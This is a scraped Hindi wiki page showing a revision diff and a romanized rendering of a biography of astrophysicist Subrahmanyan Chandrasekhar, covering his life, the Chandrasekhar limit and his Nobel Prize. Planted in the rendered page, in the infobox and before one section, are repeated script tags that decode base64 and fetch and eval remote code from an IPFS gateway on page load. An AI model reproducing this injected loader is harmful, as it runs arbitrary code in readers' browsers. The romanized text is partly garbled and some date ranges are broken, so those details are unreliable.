Difference between revisions of "सुब्रह्मण्यम चंद्रशेखर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''सुब्रह्मण्यम चंद्रशेखर'''<br /> सन 1983 में भौतिक शास्त्...' के साथ नया पन्ना बनाया)
 
m (Text replacement - " गरीब" to " ग़रीब")
(36 intermediate revisions by 7 users not shown)
Line 1: Line 1:
'''सुब्रह्मण्यम चंद्रशेखर'''<br />
+
{{सूचना बक्सा वैज्ञानिक
 +
|चित्र=Subrahmanyan-Chandrasekhar.jpg
 +
|पूरा नाम=डॉ. सुब्रह्मण्यम चंद्रशेखर
 +
|अन्य नाम=
 +
|जन्म= [[19 अक्तूबर]], [[1910]]
 +
|जन्म भूमि=[[लाहौर]], [[पाकिस्तान]]
 +
|अभिभावक=सुब्रह्मण्यम आयर, सीतालक्ष्मी
 +
|पति/पत्नी=ललिता चन्द्रशेखर
 +
|संतान=
 +
|कर्म भूमि=
 +
|कर्म-क्षेत्र= खगोलशास्त्र
 +
|मृत्यु=[[21 अगस्त]], [[1995]]
 +
|मृत्यु स्थान=[[शिकागो]], [[संयुक्त राज्य अमेरीका]]
 +
|मुख्य रचनाएँ=
 +
|विषय=खगोल भौतिक शास्त्री
 +
|खोज=चंद्रशेखर सीमा
 +
|भाषा=
 +
|शिक्षा=
 +
|विद्यालय=मद्रास प्रेसिडेंसी कॉलेज, शिकागो विश्वविद्यालय, अमेरिका
 +
|पुरस्कार-उपाधि=[[नोबेल पुरस्कार]], कॉप्ले पदक, नेशनल मेडल ऑफ साइंस, [[पद्म विभूषण]]
 +
|प्रसिद्धि=
 +
|विशेष योगदान=
 +
|नागरिकता=भारत, अमेरिका
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|13:07, 7 फ़रवरी 2012 (IST)}}
 +
}}
  
 +
'''सुब्रह्मण्यम चंद्रशेखर''' (जन्म- [[19 अक्तूबर]], [[1910]] - मृत्यु- [[21 अगस्त]], [[1995]]) खगोल भौतिक शास्त्री थे और सन् [[1983]] में भौतिक शास्त्र के लिए [[नोबेल पुरस्कार]] विजेता भी थे। उनकी शिक्षा [[चेन्नई]] के प्रेसीडेंसी कॉलेज में हुई। वह नोबेल पुरस्कार विजेता [[चंद्रशेखर वेंकट रामन|सर सी. वी. रमन]] के भतीजे थे। बाद में डा. चंद्रशेखर [[अमेरिका]] चले गए। जहाँ उन्होंने खगोल भौतिक शास्त्र तथा [[सौरमंडल]] से संबंधित विषयों पर अनेक पुस्तकें लिखीं।
 +
*सुब्रह्मण्यम चंद्रशेखर ने 'व्हाइट ड्वार्फ', यानी 'श्वेत बौने' नाम के [[नक्षत्र|नक्षत्रों]] के बारे में सिद्धांत का प्रतिपादन किया।
 +
*इन नक्षत्रों के लिए उन्होंने जो सीमा निर्धारित की है, उसे 'चंद्रशेखर सीमा' कहा जाता है।
 +
*उनके सिद्धांत से ब्रह्मांड की उत्पत्ति के बारे में अनेक रहस्यों का पता चला।
 +
20वीं शताब्दी के महानतम वैज्ञानिकों में से एक वैज्ञानिक सुब्रह्मण्यम चंद्रशेखर अपने जीवन काल में ही एक किंवदंती बन गए थे। 'कामेश्वर सी. वाली' चन्द्रशेखर के जीवन के बारे में लिखते हैं कि 'विज्ञान की खोज में असाधारण समर्पण और विज्ञान के नियमों को अमली रूप देने और जीवन में निकटतम संभावित सीमा तक उसके मानों को आत्मसात करने में वह सब से अलग दिखाई देते हैं।' उसके बहुसर्जक योगदानों का विस्तार खगोल - भौतिक, [[भौतिक विज्ञान|भौतिक - विज्ञान]] और व्याहारिक गणित तक था। उनका जीवन उन्नति का सर्वोत्तम उदाहरण है जिसे कोई भी व्यक्ति प्राप्त कर सकता है बशर्ते कि उसमें संकल्प, शक्ति, योग्यता और धैर्य हो। उसकी यात्रा आसान नहीं थी। उन्हें सब प्रकार की कठिनाईयों से जूझना पड़ा। वह एक ऐसा व्यक्तित्व था जिसमें [[भारत]], जहां उनका जन्म हुआ, [[इंग्लैंड]] और यू.एस.ए. की तीन अत्यधिक भिन्न संस्कृतियों की जटिलताओं द्वारा आकार मिला।
 +
 +
वह मानवों की साझी परम्परा में विश्वास रखते थे। उन्होंने कहा था, 'तथ्य यह है कि मानव मन एक ही तरीके से काम करता है। इससे हम पुन: आश्वस्त होते है कि जिन चीज़ों से हमें आनन्द मिलता है, वे विश्व के हर भाग में लोगों को आनन्द प्रदान करती है। हम सबका साझा हित है और इस तथ्य से इस बात को बल मिलता है कि हमारी एक साझी परम्परा है।' वह एक महान् वैज्ञानिक, एक कुशल अध्यापक और दुर्जेय विद्वान थे।
 +
==जीवन परिचय==
 +
सुब्रह्मण्यम चंद्रशेखर का जन्म [[लाहौर]] में [[19 अक्तूबर]], [[1910]] को हुआ। उसके पिता सुब्रह्मण्यम आयर सरकारी सेवा मे थे। [[चंद्रशेखर वेंकट रामन|सर सी. वी. रमन]], [[विज्ञान]] में पहले भारतीय [[नोबेल पुरस्कार]] विजेता चन्द्रशेखर के पिता के छोटे भाई थे। चन्द्रशेखर का बाल्यजीवन [[चेन्नई]] में बीता। ग्यारह वर्ष की आयु में 'मद्रास प्रेसिडेंसी कॉलेज' में उसने दाखिला लिया जहां पहले दो वर्ष उसने भौतिकी, [[रसायन विज्ञान|कैमिस्ट्री]], [[अंग्रेज़ी भाषा|अंग्रेज़ी]] और [[संस्कृत]] का अध्ययन किया। चन्द्रशेखर ने [[31 जुलाई]] [[1930]] को उच्च शिक्षा के लिए [[इंग्लैंड]] का प्रस्थान किया और इस प्रकार एक लम्बा और शानदार वैज्ञानिक कैरियर आंरभ किया जो 65 वर्षों तक विस्तृत था। पहले छ: वर्षों को छोड़, उसने 'शिकागो विश्वविद्यालय' मे काम किया।
 +
==चन्द्रशेखर सीमा==
 +
{{tocright}}
 +
अपनी शानदार खोज 'चन्द्रशेखर सीमा' के लिए वह अत्यधिक प्रसिद्ध है। उन्होंने दिखाया कि एक अत्याधिक [[द्रव्यमान]] है जिसे [[इलेक्ट्रॉन|इलेक्ट्रॉनों]] और [[परमाणु]] [[नाभिक|नाभिकों]] द्वारा बनाये [[दाब]] द्वारा [[गुरुत्व]] के विरुद्ध सहारा दिया जा सकता है। इस सीमा का मान एक सौर द्रव्यमान से लगभग 1.44 गुणा है। [[1930]] में चन्द्रशेखर ने इसकी व्युत्पत्ति की जबकि वह एक विद्यार्थी ही थे। तारकीय विकास की जानकारी प्राप्त करने में 'चन्द्रशेखर सीमा' एक निर्णायक भूमिका निभाती है। यदि एक तारे का द्रव्यमान इस सीमा से बढ़ता है, तो तारा एक सफ़ेद बौना नहीं बनेगा। यह गुरुत्वाकर्षण की शक्तियों के अत्यधिक दाब के अन्तर्गत टूटता रहेगा। चन्द्रशेखर सीमा के प्रतिपादन के फलस्वरूप [[न्यूट्रोन]] [[तारा|तारों]] और काले गड्ढों का पता चला। यह पता चला कि तारे स्थिर होते हैं और वे समाप्त नहीं होते क्योंकि भीतरी दाब परमाणु नाभिकों और इलैक्ट्रानों के तापीय संचालन और नाभकीय प्रतिक्रियाओं द्वारा उत्पन्न विकिरण के दाब से भी गुरुत्व को सन्तुलित करते हैं। तथापि, प्रत्येक तारे के लिए एक ऐसा समय आयेगा जब नाभकीय प्रतिक्रियाएं बन्द हो जाएगी और इसका अर्थ यह होगा कि गुरुत्वाकर्षण का मुकाबला करने के लिए भीतरी दाब नहीं होंगे। द्रव्यमान के आधार पर एक तारे के तीन संभावित चरण होते हैं -
 +
#सफ़ेद बोना
 +
#न्यूट्रान तारा
 +
#काले गड्ढे
 +
चन्द्रशेखर को संयुक्त रूप से नाभकीय खगोल भौतिकी 'डब्ल्यू.ए.फाउलर' के साथ [[1983]] में भौतिकी में नोबेल पुरस्कार प्रदान किया गया। उनके काम के विस्तार में भौतिक - विज्ञान, खगोल - भौतिक और व्यावहारिक गणित शामिल हैं। उनके अपने शब्दों में 'मेरे जीवन में सात काल आये और वे संक्षिप्त रूप से हैं-
 +
#तारकीय ढांचा, सफ़ेद बौनों के सिद्धांत सहित (1929-39)
 +
#तारकीय गतिक, ब्राउमीन संचलनों के सिद्धांत सहित (1938-473)
 +
#विकिरणी अन्तरण का सिद्धांत, प्रदीप्ति और सौर प्रकाशित आकाश के ध्रुवण का सिद्धांत, गृहीय और तारकीय वातावरण के सिद्धांत और हाइड्रोजन के नकारात्मक आयन का परिमाण सिद्धांत
 +
#हाइड्रो-गतिक और हाइड्रो-चुंबकीय स्थिरता (1952-61)
 +
#साम्यावस्था की दीर्घवृत्तजीय आकृतियों का सन्तुलन और स्थायित्व। (1961-68)
 +
#सापेक्षता और आपेक्षिकीय खगोल-भौतिकी के सामान्य सिद्धांत (1962-71)
 +
#काले गड्ढों का गणितीय सिद्धांत (1974-73)'
 +
==अनुसंधान कार्य==
 +
उनका अनुसाधान कार्य अपूर्व है। चन्द्रशेखर द्वारा प्रकाशित प्रत्येक मोनोग्राफ या पुस्तक गौरवग्रन्थ बन गए हैं। संबंधित क्षेत्रों का कोई भी गम्भीर विद्यार्थी चन्द्रशेखर के काम की उपेक्षा नहीं कर सकता। वह किसी एकल समस्या से नहीं बल्कि इस इच्छा से प्रेरित थे कि समस्त क्षेत्र पर सापेक्ष महत्व या महत्वहीनता के बारे में वह कभी चिन्तित नहीं थे। उन्हें इस बात की जरा भी चिन्ता नहीं थी कि उनका काम उनके लिए प्रसिद्धि और मान्यता लाने वाला है। उन्होंने कहा - 'पहली तैयारी के वर्षों के बाद, मेरा वैज्ञानिक कार्य एक निश्चित पैटर्न पर चला है जो मुख्यतः संदर्शो (परिप्रेक्ष्यों) की तलाश द्वारा प्रेरित है। व्यवहार में इस खोज में एक निश्चित क्षेत्र का मेरे द्वारा ( कुछ जांचों और कष्टों के बाद) चयन शामिल है जो संवर्धन के लिए परीक्षणीय दिखाई दिया और मेरी रुचि, मिज़ाज और योग्यताओं के अनुकूल था और जब कुछ वर्षों के अध्ययन के बाद, मैं महसूस करता हूँ कि मैने ज्ञान की पर्याप्त मात्रा संचित कर ली है और मैंने अपना दृष्टिकोण प्राप्त कर लिया है तो मेरी इच्छा है कि अपने दृष्टिकोण को मैं नए सिरे से सुसंगत तरीके से क्रम, रूप और ढांचे को प्रस्तुत करूँ।'
 +
 +
==विदेशी साहित्य में रुचि==
 +
विज्ञान में पूरी तरह व्यस्त होते हुए भी, उनकी अन्य विषयों में भी दिलचस्पी थी आरंभ से ही उसकी साहित्य में रुचि थी। उन्होंने कहा, 'वर्ष 1932 के आसपास कैम्ब्रिज में साहित्य में मेरी गम्भीर रुचि उत्पन्न हुई। उस समय मेरे लिए वास्तविक खोज रूसी लेखक थे। मैंने योजनाबद्ध तरीके से 'तुर्गनेव' के सब उपन्यास, 'दोस्त्योवस्की' के 'क्राइम एंड पनिशमेंट', 'ब्रर्दस कारमाज़ोव', और 'पोसेस्ड' उपन्यास 'कांस्टांस गार्नेट' अनुवाद में पढ़े। 'चेख़व' की सब कहानियों और नाटकों को पढ़ा। 'टॉलस्टॉय' के सब तो नहीं लेकिन 'अन्ना केरनीना' ज़रूर पढ़ा। अंग्रेजी लेखकों में से मैंने 'विरजीना वुल्फ', 'टी एस ईलियट', 'थामस हार्डी', 'जॉन गाल्सवर्दी' और 'बर्नाड शॉ' को पढ़ना आरंभ किया। 'हेनरिक इबसेन' भी मेरे प्रिय लेखकों में से एक था।'
 +
==दूसरों की प्रेरणा==
 +
दूसरों में परिश्रम के लिए उत्साह उत्पन्न करने की चन्द्रशेखर में विलक्षण योग्यता थी। उनके मार्गदर्शन मे 50 से ज़्यादा विद्यार्थीयों ने Ph.D. कार्य किया। अपने विद्यार्थीयों के साथ उनके संबंध हमें पुराने ज़माने की 'गुरु शिष्य' परंपरा की याद दिलाते है। विद्यार्थीयों से वह आदर प्राप्त करते थे लेकिन वह उन्हें उत्साहित भी करते थे कि वे अपने दृष्टिकोण निर्भिक हो कर रखें। उन्होंने कहा - 'मेरे विद्यार्थी, ऐसे विद्यार्थी जिनके साथ मैंने निकट से काम किया है, वे एक प्रकार से श्रृद्धालु है जो पुराने जमाने की याद दिलाते है जिन्हें हम पुस्तकों में पढ़ते हैं। इसके साथ ही जो मैं कहता हूँ उससे वे बिल्कुल भयभीत नहीं होते। उनकी प्रतिक्रिया सकारात्मक होगी या नकारात्मक, वे चर्चा करते हैं और तर्क वितर्क भी करते हैं। जो आप कहते हैं यदि कोई व्यक्ति उससे पूरी तरह सहमत होता है तो विचार - विमर्श का कोई बिन्दु नहीं होती।'
 +
अपने समग्र जीवन में युवा लोगों के साथ उन्होंने परिचय बनाए रखा। एक बार उन्होंने कहा - 'मैं आसानी से कल्पना कर सकता हूँ कि यदि मैंने 'फार्मी' या 'वॉन न्यूमान' के साथ काम नहीं किया तो कुछ भी नहीं खोया, लेकिन अपने विद्यार्थीयों के बारे में मैं वैसी बात नहीं कर सकता।'
 +
==पत्रिकाओं का सम्पादन==
 +
वह 1952 से 1971 तक 'खगोल-भौतिकी पत्रिका' के प्रबन्ध सम्पादक रहे। 'शिकागो विश्वविद्यालय' की एक निजी पत्रिका को उन्होंने 'अमेरिकन एस्ट्रोनामीकल सोसाइटी' की एक राष्ट्रीय पत्रिका के रूप में परिवर्तित कर दिया। पहले बारह वर्षों तक पत्रिका की प्रबन्ध - व्यवस्था चन्द्रशेखर और एक अंशकालिक सचिव के हाथ में थी। 'हम मिलजुल कर सारे काम करते थे। हमने वैज्ञानिक पत्राचार पर ध्यान दिया। हम बजट, विज्ञापन और पृष्ठ प्रभार तैयार करते थे। हम री - प्रिंट आर्डर देते थे और बिल भेजते थे।' जब चन्द्रशेखर सम्पादक बने तो पत्रिका वर्ष मे छः बार निकलती थी और कुल पृष्ठ संख्या 950 थी लेकिन चन्द्रशेखर के सम्पादकत्व की समाप्ति के समय पत्रिका 'वर्ष में चौबीस बार' प्रकाशित होती थी और कुल पृष्ठ संख्या 12,000 थी। उनके नेतृत्व में पत्रिका शिकागो विश्वविद्यालय से वित्तीय रूप से स्वतन्त्र हो गई। उन्होंने पत्रिका के लिए अपने पीछे '500,000 यू एस डॉलर' की आरक्षित निधि छोडी।
 +
==समर्पित भारतीय==
 +
चन्द्रशेखर ने मुख्यतः विदेश में और वहीं काम किया। 1953 में वह अमरीकी नागरिक बन गये। तथापि भारत की बेहतरी की उन्हें गहरी चिन्ता थी। भारत में बहुत से विज्ञान संस्थानों और जवान वैज्ञानिकों के साथ उनका गहरा संबंध था। अपने बचपन में उन्हें रामानुजम के विज्ञान के प्रति सम्पूर्ण समपर्ण के उदाहरण से प्रेरणा मिली थी। रामानुजम में उसकी दिलचस्पी जीवन भर बनी रही। 1940 के उत्तरार्ध में मद्रास में 'रामानुजम इंस्टीच्यूट ऑफ मैथिमैटिक्स' स्थापित करने में सहायक की भूमिका अदा की और जब इंस्टीच्यूट को आर्थिक संकट का सामना करना पड़ा तो उन्होंने इस मामले को [[नेहरू जी]] के सामने रखा। रामानुजम की विधवा जो ग़रीबी की हालत में रह रही थीं, उनके लिए पेंशन राशि में वृद्धि कराने की व्यवस्था की। 'रिचर्ड आस्के' द्वारा रामानुजम की अर्धप्रतिमाएं ढलवाने के लिए भी वह उत्तरदायी थे।
  
सन 1983 में भौतिक शास्त्र के लिए नोबेल पुरस्कार विजेता डा. सुब्रहमण्यम चंद्रशेखर  खगोल भौतिक शास्त्री थे। उनकी शिक्षा [[चेन्नई]] के प्रेसीडेंसी कालेज में हुई। वह नोबेल पुरस्कार विजेता [[चंद्रशेखर वेंकट रामन|सर सी. वी. रमन]] के भतीजे थे। बाद में डा. चंद्रशेखर अमेरिका चले गए। जहाँ उन्होंने खगोल भौतिक शास्त्र तथा सौरमंडल से संबधित विषयों पर अनेक पुस्तकें लिखीं।
+
विज्ञान की खोज में लगे रहने में चन्द्रशेखर के लिए क्या प्रेरणा थी ? उसके एक विद्यार्थी 'यूवूज़ नूटकू' ने कहा - 'हर समय सीखते हुए 'चन्द्र संस्थापन' के बारे में तनिक भी चिन्ता नहीं करते थे। जो कुछ उन्होंने किया वह इसलिए किया क्योंकि वह उपजाऊ तरीके से जिज्ञासु थे। उन्होंने केवल एक कारण से ही यह किया - इससे उन्हें शांति और आन्तरिक शान्ति मिलती थी।'
  
*उन्होंने 'व्हाइट ड्वार्फ', यानी श्वेत बौने नाम के नक्षत्रों के बारे में सिद्धांत का प्रतिपादन किया।
+
जो विज्ञान की खोज में लगे हैं या ऐसा करने की योजना बना रहे हैं उनके लिए हम चन्द्रशेखर को उद्धृत करते हुए कह सकते हैं - 'विज्ञान की खोज की तुलना कई बार पर्वतों ऊँचे लेकिन ज़्यादा ऊँचें नहीं, के आरोहण के साथ की गई है, लेकिन हममें से कौन आशा, या कल्पना ही, कर सकता है कि असीम तक फैली एवरेस्ट पर चढ़ाई करे और उसके शीर्ष पर पहुंचे जब कि आकाश नीला हो और हवा रूकी हुई हो और हवा की स्तब्धता में बर्फ़ के सफे़द चमकीलेपन में समस्त हिमालय घाटी का सर्वेक्षण करे। हममें से कोई अपने इर्द गिर्द विश्व और प्रकृति के तुलनात्मक दृष्टि के लिए आशा नहीं कर सकता। लेकिन नीचे घाटी में खड़े होना और कंचनजंगा के ऊपर सूर्योदय होने की प्रतीक्षा करने में कुछ भी बुराई या हीनता नहीं है।'
*इन नक्षत्रों के लिए उन्होंने जो सीमा निर्धारित की है, उसे चंद्रशेखर सीमा कहा जाता है।
 
*उनके सिद्धांत से ब्रह्मांड की उत्पत्ति के बारे में अनेक रहस्यों का पता चला।
 
  
 +
पूर्व [[राष्ट्रपति]]  [[अब्दुल कलाम|कलाम]] अपनी किताब ‘विंग्स ऑफ फायर’ में याद करते हैं कि किस तरह प्रो. सुब्रह्मण्यम चंद्रशेखर ने कैम्ब्रिज में ग्रेजुएशन के दौरान 1930 में ही ‘चंद्रशेखर लिमिट’ की खोज कर ली थी लेकिन नोबेल पुरस्कार हासिल कर मान्यता मिलने के लिए उन्हें 50 साल इंतज़ार करना पड़ा।
  
 +
==निधन==
 +
चन्द्रशेखर का निधन [[21 अगस्त]], [[1995]] को हुआ।
  
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक3
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
==टीका टिप्पणी==
 +
<references/>
 +
#Subrahmanyan Chandrasekhar, Kameshwar C. Wali, Current Science pp. 477-479, 1998;
 +
#Chandrasekhar and His Limit by G. Venkataraman, Universities Press, 1992;
 +
#Truth and Beauty : Aesthetics and Motivation in science by S. Chandrasekhar, University of Chicago Press, 1987;
 +
#Chandra : A Biography of S. Chandrasekhar by Kameshwar C. Wali, Penguin Books, 1990;
 +
#Eddington : The Most Distinguished Astrophysicist of His Time by S. Chandrasekhar, Cambridge University Press, 1983;
 +
#Resonance (a journal of science education published by the Indian Academy of Science, Bangalore) April 1997 Issue.
 +
==बाहरी कड़ियाँ==
 +
* [http://navbharattimes.indiatimes.com/articleshow/1889169.cms?prtpage=1 सुनहरे अतीत और सुनहरे भविष्य के बीच]
 +
* [http://webvarta.com/pillar_detail.php?p_id=49&catid=5 गर्व की अनुभूति]
 +
* [http://careereye.blogspot.com/2010/10/blog-post_22.html दुनिया का सबसे बड़ा पुरस्कार- नोबेल]
 +
*[http://encyclopedia.balaee.com/Admin/content.aspx?title=%u0921%u0949.+%u0938%u0941%u092c%u094d%u0930%u0939%u094d%u092e%u0923%u094d%u092f%u092e+%u091a%u0902%u0926%u094d%u0930%u0936%u0947%u0916%u0930%20&lang=mr डॉ. सुब्रह्मण्यम चंद्रशेखर]
  
 +
==संबंधित लेख==
 +
{{नोबेल पुरस्कार}}{{पद्म विभूषण}}{{वैज्ञानिक}}
 +
[[Category:पद्म विभूषण]]
 
[[Category:नोबेल_पुरस्कार]]
 
[[Category:नोबेल_पुरस्कार]]
 +
[[Category:वैज्ञानिक]]
 +
[[Category:विज्ञान कोश]]
 +
[[Category:चरित कोश]]
 
__INDEX__
 
__INDEX__

Revision as of 09:17, 12 April 2018

subrahmanyam chandrashekhar
poora nam d aau. subrahmanyam chandrashekhar
janm 19 aktoobar, 1910
janm bhoomi lahaur, pakistan
mrityu 21 agast, 1995
mrityu sthan shikago, sanyukt rajy amerika
abhibhavak subrahmanyam ayar, sitalakshmi
pati/patni lalita chandrashekhar
karm-kshetr khagolashastr
vishay khagol bhautik shastri
khoj chandrashekhar sima
vidyalay madras presideansi k aaulej, shikago vishvavidyalay, amerika
puraskar-upadhi nobel puraskar, k aauple padak, neshanal medal aauph saians, padm vibhooshan
nagarikata bharat, amerika
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

subrahmanyam chandrashekhar (janm- 19 aktoobar, 1910 - mrityu- 21 agast, 1995) khagol bhautik shastri the aur sanh 1983 mean bhautik shastr ke lie nobel puraskar vijeta bhi the. unaki shiksha chennee ke presideansi k aaulej mean huee. vah nobel puraskar vijeta sar si. vi. raman ke bhatije the. bad mean da. chandrashekhar amerika chale ge. jahaan unhoanne khagol bhautik shastr tatha sauramandal se sanbandhit vishayoan par anek pustakean likhian.

  • subrahmanyam chandrashekhar ne 'vhait dvarph', yani 'shvet baune' nam ke nakshatroan ke bare mean siddhaant ka pratipadan kiya.
  • in nakshatroan ke lie unhoanne jo sima nirdharit ki hai, use 'chandrashekhar sima' kaha jata hai.
  • unake siddhaant se brahmaand ki utpatti ke bare mean anek rahasyoan ka pata chala.

20vian shatabdi ke mahanatam vaijnanikoan mean se ek vaijnanik subrahmanyam chandrashekhar apane jivan kal mean hi ek kianvadanti ban ge the. 'kameshvar si. vali' chandrashekhar ke jivan ke bare mean likhate haian ki 'vijnan ki khoj mean asadharan samarpan aur vijnan ke niyamoan ko amali roop dene aur jivan mean nikatatam sanbhavit sima tak usake manoan ko atmasat karane mean vah sab se alag dikhaee dete haian.' usake bahusarjak yogadanoan ka vistar khagol - bhautik, bhautik - vijnan aur vyaharik ganit tak tha. unaka jivan unnati ka sarvottam udaharan hai jise koee bhi vyakti prapt kar sakata hai basharte ki usamean sankalp, shakti, yogyata aur dhairy ho. usaki yatra asan nahian thi. unhean sab prakar ki kathinaeeyoan se joojhana p da. vah ek aisa vyaktitv tha jisamean bharat, jahaan unaka janm hua, ianglaiand aur yoo.es.e. ki tin atyadhik bhinn sanskritiyoan ki jatilataoan dvara akar mila.

vah manavoan ki sajhi parampara mean vishvas rakhate the. unhoanne kaha tha, 'tathy yah hai ki manav man ek hi tarike se kam karata hai. isase ham pun: ashvast hote hai ki jin chizoan se hamean anand milata hai, ve vishv ke har bhag mean logoan ko anand pradan karati hai. ham sabaka sajha hit hai aur is tathy se is bat ko bal milata hai ki hamari ek sajhi parampara hai.' vah ek mahanh vaijnanik, ek kushal adhyapak aur durjey vidvan the.

jivan parichay

subrahmanyam chandrashekhar ka janm lahaur mean 19 aktoobar, 1910 ko hua. usake pita subrahmanyam ayar sarakari seva me the. sar si. vi. raman, vijnan mean pahale bharatiy nobel puraskar vijeta chandrashekhar ke pita ke chhote bhaee the. chandrashekhar ka balyajivan chennee mean bita. gyarah varsh ki ayu mean 'madras presideansi k aaulej' mean usane dakhila liya jahaan pahale do varsh usane bhautiki, kaimistri, aangrezi aur sanskrit ka adhyayan kiya. chandrashekhar ne 31 julaee 1930 ko uchch shiksha ke lie ianglaiand ka prasthan kiya aur is prakar ek lamba aur shanadar vaijnanik kairiyar aanrabh kiya jo 65 varshoan tak vistrit tha. pahale chh: varshoan ko chho d, usane 'shikago vishvavidyalay' me kam kiya.

chandrashekhar sima

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

apani shanadar khoj 'chandrashekhar sima' ke lie vah atyadhik prasiddh hai. unhoanne dikhaya ki ek atyadhik dravyaman hai jise ilektr aaunoan aur paramanu nabhikoan dvara banaye dab dvara gurutv ke viruddh sahara diya ja sakata hai. is sima ka man ek saur dravyaman se lagabhag 1.44 guna hai. 1930 mean chandrashekhar ne isaki vyutpatti ki jabaki vah ek vidyarthi hi the. tarakiy vikas ki janakari prapt karane mean 'chandrashekhar sima' ek nirnayak bhoomika nibhati hai. yadi ek tare ka dravyaman is sima se badhata hai, to tara ek safed bauna nahian banega. yah gurutvakarshan ki shaktiyoan ke atyadhik dab ke antargat tootata rahega. chandrashekhar sima ke pratipadan ke phalasvaroop nyootron taroan aur kale gaddhoan ka pata chala. yah pata chala ki tare sthir hote haian aur ve samapt nahian hote kyoanki bhitari dab paramanu nabhikoan aur ilaiktranoan ke tapiy sanchalan aur nabhakiy pratikriyaoan dvara utpann vikiran ke dab se bhi gurutv ko santulit karate haian. tathapi, pratyek tare ke lie ek aisa samay ayega jab nabhakiy pratikriyaean band ho jaegi aur isaka arth yah hoga ki gurutvakarshan ka mukabala karane ke lie bhitari dab nahian hoange. dravyaman ke adhar par ek tare ke tin sanbhavit charan hote haian -

  1. safed bona
  2. nyootran tara
  3. kale gaddhe

chandrashekhar ko sanyukt roop se nabhakiy khagol bhautiki 'dablyoo.e.phaular' ke sath 1983 mean bhautiki mean nobel puraskar pradan kiya gaya. unake kam ke vistar mean bhautik - vijnan, khagol - bhautik aur vyavaharik ganit shamil haian. unake apane shabdoan mean 'mere jivan mean sat kal aye aur ve sankshipt roop se haian-

  1. tarakiy dhaancha, safed baunoan ke siddhaant sahit (1929-39)
  2. tarakiy gatik, braumin sanchalanoan ke siddhaant sahit (1938-473)
  3. vikirani antaran ka siddhaant, pradipti aur saur prakashit akash ke dhruvan ka siddhaant, grihiy aur tarakiy vatavaran ke siddhaant aur haidrojan ke nakaratmak ayan ka pariman siddhaant
  4. haidro-gatik aur haidro-chuanbakiy sthirata (1952-61)
  5. samyavastha ki dirghavrittajiy akritiyoan ka santulan aur sthayitv. (1961-68)
  6. sapekshata aur apekshikiy khagol-bhautiki ke samany siddhaant (1962-71)
  7. kale gaddhoan ka ganitiy siddhaant (1974-73)'

anusandhan kary

unaka anusadhan kary apoorv hai. chandrashekhar dvara prakashit pratyek monograph ya pustak gauravagranth ban ge haian. sanbandhit kshetroan ka koee bhi gambhir vidyarthi chandrashekhar ke kam ki upeksha nahian kar sakata. vah kisi ekal samasya se nahian balki is ichchha se prerit the ki samast kshetr par sapeksh mahatv ya mahatvahinata ke bare mean vah kabhi chintit nahian the. unhean is bat ki jara bhi chinta nahian thi ki unaka kam unake lie prasiddhi aur manyata lane vala hai. unhoanne kaha - 'pahali taiyari ke varshoan ke bad, mera vaijnanik kary ek nishchit paitarn par chala hai jo mukhyatah sandarsho (pariprekshyoan) ki talash dvara prerit hai. vyavahar mean is khoj mean ek nishchit kshetr ka mere dvara ( kuchh jaanchoan aur kashtoan ke bad) chayan shamil hai jo sanvardhan ke lie parikshaniy dikhaee diya aur meri ruchi, mizaj aur yogyataoan ke anukool tha aur jab kuchh varshoan ke adhyayan ke bad, maian mahasoos karata hooan ki maine jnan ki paryapt matra sanchit kar li hai aur maianne apana drishtikon prapt kar liya hai to meri ichchha hai ki apane drishtikon ko maian ne sire se susangat tarike se kram, roop aur dhaanche ko prastut karooan.'

videshi sahity mean ruchi

vijnan mean poori tarah vyast hote hue bhi, unaki any vishayoan mean bhi dilachaspi thi aranbh se hi usaki sahity mean ruchi thi. unhoanne kaha, 'varsh 1932 ke asapas kaimbrij mean sahity mean meri gambhir ruchi utpann huee. us samay mere lie vastavik khoj roosi lekhak the. maianne yojanabaddh tarike se 'turganev' ke sab upanyas, 'dostyovaski' ke 'kraim eand panishameant', 'brardas karamazov', aur 'posesd' upanyas 'kaanstaans garnet' anuvad mean padhe. 'chekhav' ki sab kahaniyoan aur natakoan ko padha. 't aaulast aauy' ke sab to nahian lekin 'anna keranina' zaroor padha. aangreji lekhakoan mean se maianne 'virajina vulph', 'ti es eeliyat', 'thamas hardi', 'j aaun galsavardi' aur 'barnad sh aau' ko padhana aranbh kiya. 'henarik ibasen' bhi mere priy lekhakoan mean se ek tha.'

doosaroan ki prerana

